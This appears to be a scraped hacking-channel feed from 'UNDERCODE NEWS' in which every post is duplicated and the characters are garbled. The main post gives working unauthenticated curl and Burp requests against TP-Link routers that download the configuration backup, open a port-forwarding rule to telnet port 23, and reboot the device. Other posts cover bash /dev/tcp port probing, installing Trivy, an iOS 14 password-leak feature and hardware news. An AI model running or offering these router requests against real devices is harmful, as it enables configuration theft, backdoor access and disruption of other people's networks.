Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Evil Actions Without Authentication example : also in tp link routers :
A) Burp Request and curl command for conf.bin or backup file
=================
####### Burp ########
GET /cgi/conf.bin HTTP/1.1
Host: 192.168.0.1
User-Agent: Agent22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/mainFrame.htm
Connection: close
Upgrade-Insecure-Requests: 1
-------Response--------
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5720
Connection: close
w@\ΓΓb ΓͺLΓ½ΒͺΓ―Γβ‘ΓEβΉΓ»aΓΒ¬,*-Γ h[ΓβΉΒ³lΓβ¬ΓΓ.Β©-
.....SKIP.......
8/οΏ½οΏ½οΏ½οΏ½W
######## Curl ##########
curl -i -s -k -X $'GET' -H $'Host: 192.168.0.1' -H $'User-Agent:
Agent22' -H $'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H
$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H
$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close' $'
http://192.168.0.1/cgi/conf.bin' > backup.bin
------ take a look in backup.bin file --------
===========================================
=========== Add Port Forwarding ============
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP
or UDP\x0d\x0aopenProtocol=TCP or
UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[1,1,2,7,0,0]0
triggerPort=23
triggerProtocol=TCP or UDP
openProtocol=TCP or UDP
enable=1
openPort=23
[error]0
----- Decription -----
enable=0 is for disable
enable=1 is for enable
u can change port also.
====================================
=========== Reboot Router =========================
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[error]0
----Description -----
error = 0 means reboot seccessully
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Evil Actions Without Authentication example : also in tp link routers :
A) Burp Request and curl command for conf.bin or backup file
=================
####### Burp ########
GET /cgi/conf.bin HTTP/1.1
Host: 192.168.0.1
User-Agent: Agent22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/mainFrame.htm
Connection: close
Upgrade-Insecure-Requests: 1
-------Response--------
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5720
Connection: close
w@\ΓΓb ΓͺLΓ½ΒͺΓ―Γβ‘ΓEβΉΓ»aΓΒ¬,*-Γ h[ΓβΉΒ³lΓβ¬ΓΓ.Β©-
.....SKIP.......
8/οΏ½οΏ½οΏ½οΏ½W
######## Curl ##########
curl -i -s -k -X $'GET' -H $'Host: 192.168.0.1' -H $'User-Agent:
Agent22' -H $'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H
$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H
$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close' $'
http://192.168.0.1/cgi/conf.bin' > backup.bin
------ take a look in backup.bin file --------
===========================================
=========== Add Port Forwarding ============
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP
or UDP\x0d\x0aopenProtocol=TCP or
UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[1,1,2,7,0,0]0
triggerPort=23
triggerProtocol=TCP or UDP
openProtocol=TCP or UDP
enable=1
openPort=23
[error]0
----- Decription -----
enable=0 is for disable
enable=1 is for enable
u can change port also.
====================================
=========== Reboot Router =========================
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[error]0
----Description -----
error = 0 means reboot seccessully
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Trivy another good linux tool
Discovery of complex vulnerabilities
Simplicity - Specify only the name of the image or the name of the artifact.
Fast - The first scan will complete within 10 seconds (depending on your network). Follow-up scan will complete in seconds
DevSecOps - Suitable for CIs like Travis CI, CircleCI, Jenkins, GitLab CI, etc.
Support for multiple formats - including: container image, local file system, remote git repository.
Easy installation - it is possible to install apt-get, yum install and brew without prerequisites such as installing the database, libraries, etc.
How to use the Trivy image scanner
Trivy can be installed on a number of Linux distributions as well as macOS.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) sudo apt-get install wget apt-transport-https gnupg lsb-release
2) wget -qO - https://aquasecurity.github.io/trivy-repo/deb/public.key | sudo apt-key add -
echo deb https://aquasecurity.github.io/trivy-repo/deb $(lsb_release -sc) main | sudo tee /etc/apt/sources.list.d/trivy.list
3) After adding the Trivy repository, update the server and install the trivy package as follows:
4) sudo apt-get update
5) sudo apt-get install trivy
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Trivy another good linux tool
Discovery of complex vulnerabilities
Simplicity - Specify only the name of the image or the name of the artifact.
Fast - The first scan will complete within 10 seconds (depending on your network). Follow-up scan will complete in seconds
DevSecOps - Suitable for CIs like Travis CI, CircleCI, Jenkins, GitLab CI, etc.
Support for multiple formats - including: container image, local file system, remote git repository.
Easy installation - it is possible to install apt-get, yum install and brew without prerequisites such as installing the database, libraries, etc.
How to use the Trivy image scanner
Trivy can be installed on a number of Linux distributions as well as macOS.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) sudo apt-get install wget apt-transport-https gnupg lsb-release
2) wget -qO - https://aquasecurity.github.io/trivy-repo/deb/public.key | sudo apt-key add -
echo deb https://aquasecurity.github.io/trivy-repo/deb $(lsb_release -sc) main | sudo tee /etc/apt/sources.list.d/trivy.list
3) After adding the Trivy repository, update the server and install the trivy package as follows:
4) sudo apt-get update
5) sudo apt-get install trivy
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Iβm amazed at the Xbox Series X, which is full of contents, usually a power supply unit with a βdesign you want to avoidβ
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to know if a remote port is open using network forwarding:
A) Find out if a remote port is open using network redirection with bash!
Check if port 22 / TCP is open at 127.0.0.1.
$ PROTO = "tcp"; DST_ADDR = "127.0.0.1"; DST_PORT = 22; (</ dev / $ {PROTO} / $ {DST_ADDR} / $ {DST_PORT} && STATUS = "OPEN" || STATUS = "CLOSED OR UNAVAILABLE "; echo Port $ {DST_PORT} / $ {PROTO ^^} on $ {DST_ADDR} is $ {STATUS}) 2> / dev / null
B) Port 22 / TCP on 127.0.0.1 is OPEN
It's open, so let's see a TCP socket using bash again:
$ timeout 1 cat </dev/tcp/127.0.0.1/22
SSH-2.0-OpenSSH_7.9p1 Debian-10 + deb10u2
Find out if port 53 / UDP is open on 10.0.0.1.
$ PROTO = "udp"; DST_ADDR = "10.1.0.1"; DST_PORT = 53; (</ dev / $ {PROTO} / $ {DST_ADDR} / $ {DST_PORT} && STATUS = "OPEN" || STATUS = "CLOSED OR UNAVAILABLE "; echo Port $ {DST_PORT} / $ {PROTO ^^} on $ {DST_ADDR} is $ {STATUS}) 2> / dev / null
Port 53 / UDP on 10.1.0.1 is CLOSED OR UNAVAILABLE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to know if a remote port is open using network forwarding:
A) Find out if a remote port is open using network redirection with bash!
Check if port 22 / TCP is open at 127.0.0.1.
$ PROTO = "tcp"; DST_ADDR = "127.0.0.1"; DST_PORT = 22; (</ dev / $ {PROTO} / $ {DST_ADDR} / $ {DST_PORT} && STATUS = "OPEN" || STATUS = "CLOSED OR UNAVAILABLE "; echo Port $ {DST_PORT} / $ {PROTO ^^} on $ {DST_ADDR} is $ {STATUS}) 2> / dev / null
B) Port 22 / TCP on 127.0.0.1 is OPEN
It's open, so let's see a TCP socket using bash again:
$ timeout 1 cat </dev/tcp/127.0.0.1/22
SSH-2.0-OpenSSH_7.9p1 Debian-10 + deb10u2
Find out if port 53 / UDP is open on 10.0.0.1.
$ PROTO = "udp"; DST_ADDR = "10.1.0.1"; DST_PORT = 53; (</ dev / $ {PROTO} / $ {DST_ADDR} / $ {DST_PORT} && STATUS = "OPEN" || STATUS = "CLOSED OR UNAVAILABLE "; echo Port $ {DST_PORT} / $ {PROTO ^^} on $ {DST_ADDR} is $ {STATUS}) 2> / dev / null
Port 53 / UDP on 10.1.0.1 is CLOSED OR UNAVAILABLE
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦security tip for ios 14
How Password Tracking to Protect Against Hacks Works in iOS 14:
1) Most people live online these days, so they have hundreds of logins and passwords for accounts on different sites and services. In such a case, a password manager is a vital necessity. IPhones have a built-in manager. In iOS 14, it has become even more useful, as it regularly checks to see if your passwords have appeared in data leaks on the Internet.
Apple's iCloud Keychain password manager has previously been able to warn about weak passwords and the fact that they are reused in different accounts. Previously, there was no check for matching passwords with cracked ones.
2) If a password is found in a data breach, this does not mean that your account has been compromised. The password leak could have happened from another site or by stealing data from the company as a whole, not necessarily on the exact site you are using. Despite this, even if you have complex passwords, hackers regularly add passwords that hit the network to brute force lists. It is only a matter of time before you become a target and your account can be hacked.
3) Monitoring passwords in Safari
If i.Cloud Keychain is configured to automatically enter passwords in mobile apps and web apps, Safari will alert you of cracked passwords when you visit the site. If you use iCloud Keychain to automatically enter logins and passwords on sites in this browser, after logging in, the browser will warn you about the need to change the password on the site:
βThis password appeared in a data breach, which increases the risk of this account being compromised. You must change your password immediately. "
βThe iPhone can create a complex password for you. Do you want to change the password for [site name] "?
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦security tip for ios 14
How Password Tracking to Protect Against Hacks Works in iOS 14:
1) Most people live online these days, so they have hundreds of logins and passwords for accounts on different sites and services. In such a case, a password manager is a vital necessity. IPhones have a built-in manager. In iOS 14, it has become even more useful, as it regularly checks to see if your passwords have appeared in data leaks on the Internet.
Apple's iCloud Keychain password manager has previously been able to warn about weak passwords and the fact that they are reused in different accounts. Previously, there was no check for matching passwords with cracked ones.
2) If a password is found in a data breach, this does not mean that your account has been compromised. The password leak could have happened from another site or by stealing data from the company as a whole, not necessarily on the exact site you are using. Despite this, even if you have complex passwords, hackers regularly add passwords that hit the network to brute force lists. It is only a matter of time before you become a target and your account can be hacked.
3) Monitoring passwords in Safari
If i.Cloud Keychain is configured to automatically enter passwords in mobile apps and web apps, Safari will alert you of cracked passwords when you visit the site. If you use iCloud Keychain to automatically enter logins and passwords on sites in this browser, after logging in, the browser will warn you about the need to change the password on the site:
βThis password appeared in a data breach, which increases the risk of this account being compromised. You must change your password immediately. "
βThe iPhone can create a complex password for you. Do you want to change the password for [site name] "?
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Nvidia responds to serious shortage of RTX3070/3080: temporarily unable to do anything.
#international
#international
Forwarded from UNDERCODE NEWS
